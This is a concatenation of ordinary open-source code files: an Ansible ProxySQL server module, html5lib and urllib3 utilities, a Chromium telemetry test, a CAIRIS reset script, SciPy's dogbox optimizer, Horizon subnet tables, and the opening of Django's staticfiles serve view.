# several servers are being added and the user wants to push the config to
# runtime in a single batch using the M(proxysql_manage_config) module). It
# uses supplied credentials to connect to the proxysql admin interface.
- proxysql_backend_servers:
login_user: 'admin'
login_password: 'admin'
hostname: 'mysql01'
state: present
load_to_runtime: False
# This example removes a server, saves the mysql server config to disk, and
# dynamically loads the mysql server config to runtime. It uses credentials
# in a supplied config file to connect to the proxysql admin interface.
- proxysql_backend_servers:
config_file: '~/proxysql.cnf'
hostname: 'mysql02'
state: absent
'''
RETURN = '''
stdout:
description: The mysql host modified or removed from proxysql
returned: On create/update will return the newly modified host, on delete
it will return the deleted record.
type: dict
"sample": {
"changed": true,
"hostname": "192.168.52.1",
"msg": "Added server to mysql_hosts",
"server": {
"comment": "",
"compression": "0",
"hostgroup_id": "1",
"hostname": "192.168.52.1",
"max_connections": "1000",
"max_latency_ms": "0",
"max_replication_lag": "0",
"port": "3306",
"status": "ONLINE",
"use_ssl": "0",
"weight": "1"
},
"state": "present"
}
'''
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'community'}
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.mysql import mysql_connect, mysql_driver, mysql_driver_fail_msg
from ansible.module_utils.six import iteritems
from ansible.module_utils._text import to_native
# ===========================================
# proxysql module specific support methods.
#
def perform_checks(module):
if module.params["login_port"] < 0 \
or module.params["login_port"] > 65535:
module.fail_json(
msg="login_port must be a valid unix port number (0-65535)"
)
if module.params["port"] < 0 \
or module.params["port"] > 65535:
module.fail_json(
msg="port must be a valid unix port number (0-65535)"
)
if module.params["compression"]:
if module.params["compression"] < 0 \
or module.params["compression"] > 102400:
module.fail_json(
msg="compression must be set between 0 and 102400"
)
if module.params["max_replication_lag"]:
if module.params["max_replication_lag"] < 0 \
or module.params["max_replication_lag"] > 126144000:
module.fail_json(
msg="max_replication_lag must be set between 0 and 102400"
)
if mysql_driver is None:
module.fail_json(msg=mysql_driver_fail_msg)
def save_config_to_disk(cursor):
cursor.execute("SAVE MYSQL SERVERS TO DISK")
return True
def load_config_to_runtime(cursor):
cursor.execute("LOAD MYSQL SERVERS TO RUNTIME")
return True
class ProxySQLServer(object):
def __init__(self, module):
self.state = module.params["state"]
self.save_to_disk = module.params["save_to_disk"]
self.load_to_runtime = module.params["load_to_runtime"]
self.hostgroup_id = module.params["hostgroup_id"]
self.hostname = module.params["hostname"]
self.port = module.params["port"]
config_data_keys = ["status",
"weight",
"compression",
"max_connections",
"max_replication_lag",
"use_ssl",
"max_latency_ms",
"comment"]
self.config_data = dict((k, module.params[k])
for k in config_data_keys)
def check_server_config_exists(self, cursor):
query_string = \
"""SELECT count(*) AS `host_count`
FROM mysql_servers
WHERE hostgroup_id = %s
AND hostname = %s
AND port = %s"""
query_data = \
[self.hostgroup_id,
self.hostname,
self.port]
cursor.execute(query_string, query_data)
check_count = cursor.fetchone()
return (int(check_count['host_count']) > 0)
def check_server_config(self, cursor):
query_string = \
"""SELECT count(*) AS `host_count`
FROM mysql_servers
WHERE hostgroup_id = %s
AND hostname = %s
AND port = %s"""
query_data = \
[self.hostgroup_id,
self.hostname,
self.port]
for col, val in iteritems(self.config_data):
if val is not None:
query_data.append(val)
query_string += "\n AND " + col + " = %s"
cursor.execute(query_string, query_data)
check_count = cursor.fetchone()
return (int(check_count['host_count']) > 0)
def get_server_config(self, cursor):
query_string = \
"""SELECT *
FROM mysql_servers
WHERE hostgroup_id = %s
AND hostname = %s
AND port = %s"""
query_data = \
[self.hostgroup_id,
self.hostname,
self.port]
cursor.execute(query_string, query_data)
server = cursor.fetchone()
return server
def create_server_config(self, cursor):
query_string = \
"""INSERT INTO mysql_servers (
hostgroup_id,
hostname,
port"""
cols = 3
query_data = \
[self.hostgroup_id,
self.hostname,
self.port]
for col, val in iteritems(self.config_data):
if val is not None:
cols += 1
query_data.append(val)
query_string += ",\n" + col
query_string += \
(")\n" +
"VALUES (" +
"%s ," * cols)
query_string = query_string[:-2]
query_string += ")"
cursor.execute(query_string, query_data)
return True
def update_server_config(self, cursor):
query_string = """UPDATE mysql_servers"""
cols = 0
query_data = []
for col, val in iteritems(self.config_data):
if val is not None:
cols += 1
query_data.append(val)
if cols == 1:
query_string += "\nSET " + col + "= %s,"
else:
query_string += "\n " + col + " = %s,"
query_string = query_string[:-1]
query_string += ("\nWHERE hostgroup_id = %s\n AND hostname = %s" +
"\n AND port = %s")
query_data.append(self.hostgroup_id)
query_data.append(self.hostname)
query_data.append(self.port)
cursor.execute(query_string, query_data)
return True
def delete_server_config(self, cursor):
query_string = \
"""DELETE FROM mysql_servers
WHERE hostgroup_id = %s
AND hostname = %s
AND port = %s"""
query_data = \
[self.hostgroup_id,
self.hostname,
self.port]
cursor.execute(query_string, query_data)
return True
def manage_config(self, cursor, state):
if state:
if self.save_to_disk:
save_config_to_disk(cursor)
if self.load_to_runtime:
load_config_to_runtime(cursor)
def create_server(self, check_mode, result, cursor):
if not check_mode:
result['changed'] = \
self.create_server_config(cursor)
result['msg'] = "Added server to mysql_hosts"
result['server'] = \
self.get_server_config(cursor)
self.manage_config(cursor,
result['changed'])
else:
result['changed'] = True
result['msg'] = ("Server would have been added to" +
" mysql_hosts, however check_mode" +
" is enabled.")
def update_server(self, check_mode, result, cursor):
if not check_mode:
result['changed'] = \
self.update_server_config(cursor)
result['msg'] = "Updated server in mysql_hosts"
result['server'] = \
self.get_server_config(cursor)
self.manage_config(cursor,
result['changed'])
else:
result['changed'] = True
result['msg'] = ("Server would have been updated in" +
" mysql_hosts, however check_mode" +
" is enabled.")
def delete_server(self, check_mode, result, cursor):
if not check_mode:
result['server'] = \
self.get_server_config(cursor)
result['changed'] = \
self.delete_server_config(cursor)
result['msg'] = "Deleted server from mysql_hosts"
self.manage_config(cursor,
result['changed'])
else:
result['changed'] = True
result['msg'] = ("Server would have been deleted from" +
" mysql_hosts, however check_mode is" +
" enabled.")
# ===========================================
# Module execution.
#
def main():
module = AnsibleModule(
argument_spec=dict(
login_user=dict(default=None, type='str'),
login_password=dict(default=None, no_log=True, type='str'),
login_host=dict(default='127.0.0.1'),
login_unix_socket=dict(default=None),
login_port=dict(default=6032, type='int'),
config_file=dict(default='', type='path'),
hostgroup_id=dict(default=0, type='int'),
hostname=dict(required=True, type='str'),
port=dict(default=3306, type='int'),
status=dict(choices=['ONLINE',
'OFFLINE_SOFT',
'OFFLINE_HARD']),
weight=dict(type='int'),
compression=dict(type='int'),
max_connections=dict(type='int'),
max_replication_lag=dict(type='int'),
use_ssl=dict(type='bool'),
max_latency_ms=dict(type='int'),
comment=dict(default='', type='str'),
state=dict(default='present', choices=['present',
'absent']),
save_to_disk=dict(default=True, type='bool'),
load_to_runtime=dict(default=True, type='bool')
),
supports_check_mode=True
)
perform_checks(module)
login_user = module.params["login_user"]
login_password = module.params["login_password"]
config_file = module.params["config_file"]
cursor = None
try:
cursor = mysql_connect(module,
login_user,
login_password,
config_file,
cursor_class=mysql_driver.cursors.DictCursor)
except mysql_driver.Error as e:
module.fail_json(
msg="unable to connect to ProxySQL Admin Module.. %s" % to_native(e)
)
proxysql_server = ProxySQLServer(module)
result = {}
result['state'] = proxysql_server.state
if proxysql_server.hostname:
result['hostname'] = proxysql_server.hostname
if proxysql_server.state == "present":
try:
if not proxysql_server.check_server_config(cursor):
if not proxysql_server.check_server_config_exists(cursor):
proxysql_server.create_server(module.check_mode,
result,
cursor)
else:
proxysql_server.update_server(module.check_mode,
result,
cursor)
else:
result['changed'] = False
result['msg'] = ("The server already exists in mysql_hosts" +
" and doesn't need to be updated.")
result['server'] = \
proxysql_server.get_server_config(cursor)
except mysql_driver.Error as e:
module.fail_json(
msg="unable to modify server.. %s" % to_native(e)
)
elif proxysql_server.state == "absent":
try:
if proxysql_server.check_server_config_exists(cursor):
proxysql_server.delete_server(module.check_mode,
result,
cursor)
else:
result['changed'] = False
result['msg'] = ("The server is already absent from the" +
" mysql_hosts memory configuration")
except mysql_driver.Error as e:
module.fail_json(
msg="unable to remove server.. %s" % to_native(e)
)
module.exit_json(**result)
if __name__ == '__main__':
main()
| gpl-3.0 |
unreal666/outwiker | plugins/webpage/webpage/libs/html5lib/treebuilders/__init__.py | 156 | 3592 | """A collection of modules for building different kinds of trees from HTML
documents.
To create a treebuilder for a new type of tree, you need to do
implement several things:
1. A set of classes for various types of elements: Document, Doctype, Comment,
Element. These must implement the interface of ``base.treebuilders.Node``
(although comment nodes have a different signature for their constructor,
see ``treebuilders.etree.Comment``) Textual content may also be implemented
as another node type, or not, as your tree implementation requires.
2. A treebuilder object (called ``TreeBuilder`` by convention) that inherits
from ``treebuilders.base.TreeBuilder``. This has 4 required attributes:
* ``documentClass`` - the class to use for the bottommost node of a document
* ``elementClass`` - the class to use for HTML Elements
* ``commentClass`` - the class to use for comments
* ``doctypeClass`` - the class to use for doctypes
It also has one required method:
* ``getDocument`` - Returns the root node of the complete document tree
3. If you wish to run the unit tests, you must also create a ``testSerializer``
method on your treebuilder which accepts a node and returns a string
containing Node and its children serialized according to the format used in
the unittests
"""
from __future__ import absolute_import, division, unicode_literals
from .._utils import default_etree
treeBuilderCache = {}
def getTreeBuilder(treeType, implementation=None, **kwargs):
"""Get a TreeBuilder class for various types of trees with built-in support
:arg treeType: the name of the tree type required (case-insensitive). Supported
values are:
* "dom" - A generic builder for DOM implementations, defaulting to a
xml.dom.minidom based implementation.
* "etree" - A generic builder for tree implementations exposing an
ElementTree-like interface, defaulting to xml.etree.cElementTree if
available and xml.etree.ElementTree if not.
* "lxml" - A etree-based builder for lxml.etree, handling limitations
of lxml's implementation.
:arg implementation: (Currently applies to the "etree" and "dom" tree
types). A module implementing the tree type e.g. xml.etree.ElementTree
or xml.etree.cElementTree.
:arg kwargs: Any additional options to pass to the TreeBuilder when
creating it.
Example:
>>> from html5lib.treebuilders import getTreeBuilder
>>> builder = getTreeBuilder('etree')
"""
treeType = treeType.lower()
if treeType not in treeBuilderCache:
if treeType == "dom":
from . import dom
# Come up with a sane default (pref. from the stdlib)
if implementation is None:
from xml.dom import minidom
implementation = minidom
# NEVER cache here, caching is done in the dom submodule
return dom.getDomModule(implementation, **kwargs).TreeBuilder
elif treeType == "lxml":
from . import etree_lxml
treeBuilderCache[treeType] = etree_lxml.TreeBuilder
elif treeType == "etree":
from . import etree
if implementation is None:
implementation = default_etree
# NEVER cache here, caching is done in the etree submodule
return etree.getETreeModule(implementation, **kwargs).TreeBuilder
else:
raise ValueError("""Unrecognised treebuilder "%s" """ % treeType)
return treeBuilderCache.get(treeType)
| gpl-3.0 |
spirrello/spirrello-pynet-work | applied_python/lib/python2.7/site-packages/pip/_vendor/requests/packages/urllib3/util/connection.py | 252 | 3265 | import socket
try:
from select import poll, POLLIN
except ImportError: # `poll` doesn't exist on OSX and other platforms
poll = False
try:
from select import select
except ImportError: # `select` doesn't exist on AppEngine.
select = False
def is_connection_dropped(conn): # Platform-specific
"""
Returns True if the connection is dropped and should be closed.
:param conn:
:class:`httplib.HTTPConnection` object.
Note: For platforms like AppEngine, this will always return ``False`` to
let the platform handle connection recycling transparently for us.
"""
sock = getattr(conn, 'sock', False)
if sock is False: # Platform-specific: AppEngine
return False
if sock is None: # Connection already closed (such as by httplib).
return True
if not poll:
if not select: # Platform-specific: AppEngine
return False
try:
return select([sock], [], [], 0.0)[0]
except socket.error:
return True
# This version is better on platforms that support it.
p = poll()
p.register(sock, POLLIN)
for (fno, ev) in p.poll(0.0):
if fno == sock.fileno():
# Either data is buffered (bad), or the connection is dropped.
return True
# This function is copied from socket.py in the Python 2.7 standard
# library test suite. Added to its signature is only `socket_options`.
def create_connection(address, timeout=socket._GLOBAL_DEFAULT_TIMEOUT,
source_address=None, socket_options=None):
"""Connect to *address* and return the socket object.
Convenience function. Connect to *address* (a 2-tuple ``(host,
port)``) and return the socket object. Passing the optional
*timeout* parameter will set the timeout on the socket instance
before attempting to connect. If no *timeout* is supplied, the
global default timeout setting returned by :func:`getdefaulttimeout`
is used. If *source_address* is set it must be a tuple of (host, port)
for the socket to bind as a source address before making the connection.
An host of '' or port 0 tells the OS to use the default.
"""
host, port = address
err = None
for res in socket.getaddrinfo(host, port, 0, socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
sock = None
try:
sock = socket.socket(af, socktype, proto)
# If provided, set socket level options before connecting.
# This is the only addition urllib3 makes to this function.
_set_socket_options(sock, socket_options)
if timeout is not socket._GLOBAL_DEFAULT_TIMEOUT:
sock.settimeout(timeout)
if source_address:
sock.bind(source_address)
sock.connect(sa)
return sock
except socket.error as _:
err = _
if sock is not None:
sock.close()
if err is not None:
raise err
else:
raise socket.error("getaddrinfo returns an empty list")
def _set_socket_options(sock, options):
if options is None:
return
for opt in options:
sock.setsockopt(*opt)
| gpl-3.0 |
jaruba/chromium.src | tools/telemetry/telemetry/page/actions/pinch_unittest.py | 12 | 1651 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from telemetry.page.actions import action_runner as action_runner_module
from telemetry.page.actions import page_action
from telemetry.unittest_util import tab_test_case
class PinchActionTest(tab_test_case.TabTestCase):
def setUp(self):
super(PinchActionTest, self).setUp()
def testPinchByApiCalledWithCorrectArguments(self):
self.Navigate('blank.html')
if not page_action.IsGestureSourceTypeSupported(self._tab, 'touch'):
return
action_runner = action_runner_module.ActionRunner(self._tab)
action_runner.ExecuteJavaScript('''
chrome.gpuBenchmarking.pinchBy = function(
scaleFactor, anchorLeft, anchorTop, callback, speed) {
window.__test_scaleFactor = scaleFactor;
window.__test_anchorLeft = anchorLeft;
window.__test_anchorTop = anchorTop;
window.__test_callback = callback;
window.__test_speed = speed;
window.__pinchActionDone = true;
};''')
action_runner.PinchPage(scale_factor=2)
self.assertEqual(
2, action_runner.EvaluateJavaScript('window.__test_scaleFactor'))
self.assertTrue(
action_runner.EvaluateJavaScript('!isNaN(window.__test_anchorLeft)'))
self.assertTrue(
action_runner.EvaluateJavaScript('!isNaN(window.__test_anchorTop)'))
self.assertTrue(
action_runner.EvaluateJavaScript('!!window.__test_callback'))
self.assertEqual(
800, action_runner.EvaluateJavaScript('window.__test_speed'))
| bsd-3-clause |
failys/CAIRIS | cairis/bin/reset_cairis_user.py | 1 | 2636 | #!/usr/bin/python3
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import logging
import argparse
import sys
from cairis.core.Borg import Borg
import cairis.core.BorgFactory
from cairis.core.dba import resetUser,accounts
from cairis.mio.ModelExport import exportPackage
from cairis.bin.cimport import package_import
__author__ = 'Shamal Faily'
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger('reset_user')
def resetDatabase(cairisRoot,rPasswd,dbHost,dbPort,user,isReload):
cairis.core.BorgFactory.initialise(user=user,db='default')
b = Borg()
packageFile = '/tmp/' + user + '.cairis'
if (isReload == '1'):
logger.info('Exporting ' + user + ' default database')
exportPackage(packageFile,b.dbProxy)
logger.info('Resetting ' + user)
resetUser(cairisRoot,rPasswd, dbHost, dbPort, user)
cairis.core.BorgFactory.initialise(user=user,db='default')
if (isReload == '1'):
logger.info('Re-importing ' + user + ' default database')
pkgStr = open(packageFile,'rb').read()
package_import(pkgStr)
def main():
parser = argparse.ArgumentParser(description='Computer Aided Integration of Requirements and Information Security - Reset CAIRIS user')
parser.add_argument('user',help='Email address or all for all users')
parser.add_argument('--reload',dest='isReload',help='If 1 is set, reload the contents of the default database', default='0')
args = parser.parse_args()
cairis.core.BorgFactory.dInitialise()
b = Borg()
if (args.user != 'all'):
resetDatabase(b.cairisRoot,b.rPasswd,b.dbHost,b.dbPort,args.user,args.isReload)
else:
for email in accounts(b.cairisRoot,b.dbHost,b.dbPort):
resetDatabase(b.cairisRoot,b.rPasswd,b.dbHost,b.dbPort,email,args.isReload)
if __name__ == '__main__':
try:
main()
except Exception as e:
print('Fatal reset_cairis_user error: ' + str(e))
sys.exit(-1)
| apache-2.0 |
aeklant/scipy | scipy/optimize/_lsq/dogbox.py | 8 | 11597 | """
Dogleg algorithm with rectangular trust regions for least-squares minimization.
The description of the algorithm can be found in [Voglis]_. The algorithm does
trust-region iterations, but the shape of trust regions is rectangular as
opposed to conventional elliptical. The intersection of a trust region and
an initial feasible region is again some rectangle. Thus, on each iteration a
bound-constrained quadratic optimization problem is solved.
A quadratic problem is solved by well-known dogleg approach, where the
function is minimized along piecewise-linear "dogleg" path [NumOpt]_,
Chapter 4. If Jacobian is not rank-deficient then the function is decreasing
along this path, and optimization amounts to simply following along this
path as long as a point stays within the bounds. A constrained Cauchy step
(along the anti-gradient) is considered for safety in rank deficient cases,
in this situations the convergence might be slow.
If during iterations some variable hit the initial bound and the component
of anti-gradient points outside the feasible region, then a next dogleg step
won't make any progress. At this state such variables satisfy first-order
optimality conditions and they are excluded before computing a next dogleg
step.
Gauss-Newton step can be computed exactly by `numpy.linalg.lstsq` (for dense
Jacobian matrices) or by iterative procedure `scipy.sparse.linalg.lsmr` (for
dense and sparse matrices, or Jacobian being LinearOperator). The second
option allows to solve very large problems (up to couple of millions of
residuals on a regular PC), provided the Jacobian matrix is sufficiently
sparse. But note that dogbox is not very good for solving problems with
large number of constraints, because of variables exclusion-inclusion on each
iteration (a required number of function evaluations might be high or accuracy
of a solution will be poor), thus its large-scale usage is probably limited
to unconstrained problems.
References
----------
.. [Voglis] C. Voglis and I. E. Lagaris, "A Rectangular Trust Region Dogleg
Approach for Unconstrained and Bound Constrained Nonlinear
Optimization", WSEAS International Conference on Applied
Mathematics, Corfu, Greece, 2004.
.. [NumOpt] J. Nocedal and S. J. Wright, "Numerical optimization, 2nd edition".
"""
import numpy as np
from numpy.linalg import lstsq, norm
from scipy.sparse.linalg import LinearOperator, aslinearoperator, lsmr
from scipy.optimize import OptimizeResult
from .common import (
step_size_to_bound, in_bounds, update_tr_radius, evaluate_quadratic,
build_quadratic_1d, minimize_quadratic_1d, compute_grad,
compute_jac_scale, check_termination, scale_for_robust_loss_function,
print_header_nonlinear, print_iteration_nonlinear)
def lsmr_operator(Jop, d, active_set):
"""Compute LinearOperator to use in LSMR by dogbox algorithm.
`active_set` mask is used to excluded active variables from computations
of matrix-vector products.
"""
m, n = Jop.shape
def matvec(x):
x_free = x.ravel().copy()
x_free[active_set] = 0
return Jop.matvec(x * d)
def rmatvec(x):
r = d * Jop.rmatvec(x)
r[active_set] = 0
return r
return LinearOperator((m, n), matvec=matvec, rmatvec=rmatvec, dtype=float)
def find_intersection(x, tr_bounds, lb, ub):
"""Find intersection of trust-region bounds and initial bounds.
Returns
-------
lb_total, ub_total : ndarray with shape of x
Lower and upper bounds of the intersection region.
orig_l, orig_u : ndarray of bool with shape of x
True means that an original bound is taken as a corresponding bound
in the intersection region.
tr_l, tr_u : ndarray of bool with shape of x
True means that a trust-region bound is taken as a corresponding bound
in the intersection region.
"""
lb_centered = lb - x
ub_centered = ub - x
lb_total = np.maximum(lb_centered, -tr_bounds)
ub_total = np.minimum(ub_centered, tr_bounds)
orig_l = np.equal(lb_total, lb_centered)
orig_u = np.equal(ub_total, ub_centered)
tr_l = np.equal(lb_total, -tr_bounds)
tr_u = np.equal(ub_total, tr_bounds)
return lb_total, ub_total, orig_l, orig_u, tr_l, tr_u
def dogleg_step(x, newton_step, g, a, b, tr_bounds, lb, ub):
"""Find dogleg step in a rectangular region.
Returns
-------
step : ndarray, shape (n,)
Computed dogleg step.
bound_hits : ndarray of int, shape (n,)
Each component shows whether a corresponding variable hits the
initial bound after the step is taken:
* 0 - a variable doesn't hit the bound.
* -1 - lower bound is hit.
* 1 - upper bound is hit.
tr_hit : bool
Whether the step hit the boundary of the trust-region.
"""
lb_total, ub_total, orig_l, orig_u, tr_l, tr_u = find_intersection(
x, tr_bounds, lb, ub
)
bound_hits = np.zeros_like(x, dtype=int)
if in_bounds(newton_step, lb_total, ub_total):
return newton_step, bound_hits, False
to_bounds, _ = step_size_to_bound(np.zeros_like(x), -g, lb_total, ub_total)
# The classical dogleg algorithm would check if Cauchy step fits into
# the bounds, and just return it constrained version if not. But in a
# rectangular trust region it makes sense to try to improve constrained
# Cauchy step too. Thus, we don't distinguish these two cases.
cauchy_step = -minimize_quadratic_1d(a, b, 0, to_bounds)[0] * g
step_diff = newton_step - cauchy_step
step_size, hits = step_size_to_bound(cauchy_step, step_diff,
lb_total, ub_total)
bound_hits[(hits < 0) & orig_l] = -1
bound_hits[(hits > 0) & orig_u] = 1
tr_hit = np.any((hits < 0) & tr_l | (hits > 0) & tr_u)
return cauchy_step + step_size * step_diff, bound_hits, tr_hit
def dogbox(fun, jac, x0, f0, J0, lb, ub, ftol, xtol, gtol, max_nfev, x_scale,
loss_function, tr_solver, tr_options, verbose):
f = f0
f_true = f.copy()
nfev = 1
J = J0
njev = 1
if loss_function is not None:
rho = loss_function(f)
cost = 0.5 * np.sum(rho[0])
J, f = scale_for_robust_loss_function(J, f, rho)
else:
cost = 0.5 * np.dot(f, f)
g = compute_grad(J, f)
jac_scale = isinstance(x_scale, str) and x_scale == 'jac'
if jac_scale:
scale, scale_inv = compute_jac_scale(J)
else:
scale, scale_inv = x_scale, 1 / x_scale
Delta = norm(x0 * scale_inv, ord=np.inf)
if Delta == 0:
Delta = 1.0
on_bound = np.zeros_like(x0, dtype=int)
on_bound[np.equal(x0, lb)] = -1
on_bound[np.equal(x0, ub)] = 1
x = x0
step = np.empty_like(x0)
if max_nfev is None:
max_nfev = x0.size * 100
termination_status = None
iteration = 0
step_norm = None
actual_reduction = None
if verbose == 2:
print_header_nonlinear()
while True:
active_set = on_bound * g < 0
free_set = ~active_set
g_free = g[free_set]
g_full = g.copy()
g[active_set] = 0
g_norm = norm(g, ord=np.inf)
if g_norm < gtol:
termination_status = 1
if verbose == 2:
print_iteration_nonlinear(iteration, nfev, cost, actual_reduction,
step_norm, g_norm)
if termination_status is not None or nfev == max_nfev:
break
x_free = x[free_set]
lb_free = lb[free_set]
ub_free = ub[free_set]
scale_free = scale[free_set]
# Compute (Gauss-)Newton and build quadratic model for Cauchy step.
if tr_solver == 'exact':
J_free = J[:, free_set]
newton_step = lstsq(J_free, -f, rcond=-1)[0]
# Coefficients for the quadratic model along the anti-gradient.
a, b = build_quadratic_1d(J_free, g_free, -g_free)
elif tr_solver == 'lsmr':
Jop = aslinearoperator(J)
# We compute lsmr step in scaled variables and then
# transform back to normal variables, if lsmr would give exact lsq
# solution, this would be equivalent to not doing any
# transformations, but from experience it's better this way.
# We pass active_set to make computations as if we selected
# the free subset of J columns, but without actually doing any
# slicing, which is expensive for sparse matrices and impossible
# for LinearOperator.
lsmr_op = lsmr_operator(Jop, scale, active_set)
newton_step = -lsmr(lsmr_op, f, **tr_options)[0][free_set]
newton_step *= scale_free
# Components of g for active variables were zeroed, so this call
# is correct and equivalent to using J_free and g_free.
a, b = build_quadratic_1d(Jop, g, -g)
actual_reduction = -1.0
while actual_reduction <= 0 and nfev < max_nfev:
tr_bounds = Delta * scale_free
step_free, on_bound_free, tr_hit = dogleg_step(
x_free, newton_step, g_free, a, b, tr_bounds, lb_free, ub_free)
step.fill(0.0)
step[free_set] = step_free
if tr_solver == 'exact':
predicted_reduction = -evaluate_quadratic(J_free, g_free,
step_free)
elif tr_solver == 'lsmr':
predicted_reduction = -evaluate_quadratic(Jop, g, step)
x_new = x + step
f_new = fun(x_new)
nfev += 1
step_h_norm = norm(step * scale_inv, ord=np.inf)
if not np.all(np.isfinite(f_new)):
Delta = 0.25 * step_h_norm
continue
# Usual trust-region step quality estimation.
if loss_function is not None:
cost_new = loss_function(f_new, cost_only=True)
else:
cost_new = 0.5 * np.dot(f_new, f_new)
actual_reduction = cost - cost_new
Delta, ratio = update_tr_radius(
Delta, actual_reduction, predicted_reduction,
step_h_norm, tr_hit
)
step_norm = norm(step)
termination_status = check_termination(
actual_reduction, cost, step_norm, norm(x), ratio, ftol, xtol)
if termination_status is not None:
break
if actual_reduction > 0:
on_bound[free_set] = on_bound_free
x = x_new
# Set variables exactly at the boundary.
mask = on_bound == -1
x[mask] = lb[mask]
mask = on_bound == 1
x[mask] = ub[mask]
f = f_new
f_true = f.copy()
cost = cost_new
J = jac(x, f)
njev += 1
if loss_function is not None:
rho = loss_function(f)
J, f = scale_for_robust_loss_function(J, f, rho)
g = compute_grad(J, f)
if jac_scale:
scale, scale_inv = compute_jac_scale(J, scale_inv)
else:
step_norm = 0
actual_reduction = 0
iteration += 1
if termination_status is None:
termination_status = 0
return OptimizeResult(
x=x, cost=cost, fun=f_true, jac=J, grad=g_full, optimality=g_norm,
active_mask=on_bound, nfev=nfev, njev=njev, status=termination_status)
| bsd-3-clause |
liyitest/rr | openstack_dashboard/dashboards/project/networks/subnets/tables.py | 61 | 5330 | # Copyright 2012 NEC Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
from django.core.urlresolvers import reverse
from django.core.urlresolvers import reverse_lazy
from django.utils.translation import ugettext_lazy as _
from django.utils.translation import ungettext_lazy
from horizon import exceptions
from horizon import tables
from horizon.utils import memoized
from openstack_dashboard import api
from openstack_dashboard import policy
from openstack_dashboard.usage import quotas
LOG = logging.getLogger(__name__)
class CheckNetworkEditable(object):
"""Mixin class to determine the specified network is editable."""
def allowed(self, request, datum=None):
# Only administrator is allowed to create and manage subnets
# on shared networks.
network = self.table._get_network()
if network.shared:
return False
return True
class SubnetPolicyTargetMixin(policy.PolicyTargetMixin):
def get_policy_target(self, request, datum=None):
policy_target = super(SubnetPolicyTargetMixin, self)\
.get_policy_target(request, datum)
network = self.table._get_network()
policy_target["network:project_id"] = network.tenant_id
return policy_target
class DeleteSubnet(SubnetPolicyTargetMixin, CheckNetworkEditable,
tables.DeleteAction):
@staticmethod
def action_present(count):
return ungettext_lazy(
u"Delete Subnet",
u"Delete Subnets",
count
)
@staticmethod
def action_past(count):
return ungettext_lazy(
u"Deleted Subnet",
u"Deleted Subnets",
count
)
policy_rules = (("network", "delete_subnet"),)
def delete(self, request, obj_id):
try:
api.neutron.subnet_delete(request, obj_id)
except Exception:
msg = _('Failed to delete subnet %s') % obj_id
LOG.info(msg)
network_id = self.table.kwargs['network_id']
redirect = reverse('horizon:project:networks:detail',
args=[network_id])
exceptions.handle(request, msg, redirect=redirect)
class CreateSubnet(SubnetPolicyTargetMixin, CheckNetworkEditable,
tables.LinkAction):
name = "create"
verbose_name = _("Create Subnet")
url = "horizon:project:networks:addsubnet"
classes = ("ajax-modal",)
icon = "plus"
policy_rules = (("network", "create_subnet"),)
def get_link_url(self, datum=None):
network_id = self.table.kwargs['network_id']
return reverse(self.url, args=(network_id,))
def allowed(self, request, datum=None):
usages = quotas.tenant_quota_usages(request)
if usages['subnets']['available'] <= 0:
if 'disabled' not in self.classes:
self.classes = [c for c in self.classes] + ['disabled']
self.verbose_name = _('Create Subnet (Quota exceeded)')
else:
self.verbose_name = _('Create Subnet')
self.classes = [c for c in self.classes if c != 'disabled']
return True
class UpdateSubnet(SubnetPolicyTargetMixin, CheckNetworkEditable,
tables.LinkAction):
name = "update"
verbose_name = _("Edit Subnet")
url = "horizon:project:networks:editsubnet"
classes = ("ajax-modal",)
icon = "pencil"
policy_rules = (("network", "update_subnet"),)
def get_link_url(self, subnet):
network_id = self.table.kwargs['network_id']
return reverse(self.url, args=(network_id, subnet.id))
class SubnetsTable(tables.DataTable):
name = tables.Column("name_or_id", verbose_name=_("Name"),
link='horizon:project:networks:subnets:detail')
cidr = tables.Column("cidr", verbose_name=_("Network Address"))
ip_version = tables.Column("ipver_str", verbose_name=_("IP Version"))
gateway_ip = tables.Column("gateway_ip", verbose_name=_("Gateway IP"))
failure_url = reverse_lazy('horizon:project:networks:index')
@memoized.memoized_method
def _get_network(self):
try:
network_id = self.kwargs['network_id']
network = api.neutron.network_get(self.request, network_id)
network.set_id_as_name_if_empty(length=0)
except Exception:
msg = _('Unable to retrieve details for network "%s".') \
% (network_id)
exceptions.handle(self.request, msg, redirect=self.failure_url)
return network
class Meta(object):
name = "subnets"
verbose_name = _("Subnets")
table_actions = (CreateSubnet, DeleteSubnet)
row_actions = (UpdateSubnet, DeleteSubnet)
hidden_title = False
| apache-2.0 |
egenerat/flight-manager | django/contrib/staticfiles/views.py | 9 | 6167 | """
Views and functions for serving static files. These are only to be used during
development, and SHOULD NOT be used in a production setting.
"""
import mimetypes
import os
import posixpath
import re
import stat
import urllib
from email.Utils import parsedate_tz, mktime_tz
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.http import Http404, HttpResponse, HttpResponseRedirect, HttpResponseNotModified
from django.template import loader, Template, Context, TemplateDoesNotExist
from django.utils.http import http_date
from django.contrib.staticfiles import finders, utils
def serve(request, path, document_root=None, show_indexes=False, insecure=False):
"""
Serve static files below a given point in the directory structure or
from locations inferred from the static files finders.
To use, put a URL pattern such as::
(r'^(?P<path>.*)$', 'django.contrib.staticfiles.views.serve')
in your URLconf.
If you provide the ``document_root`` parameter, the file won't be looked
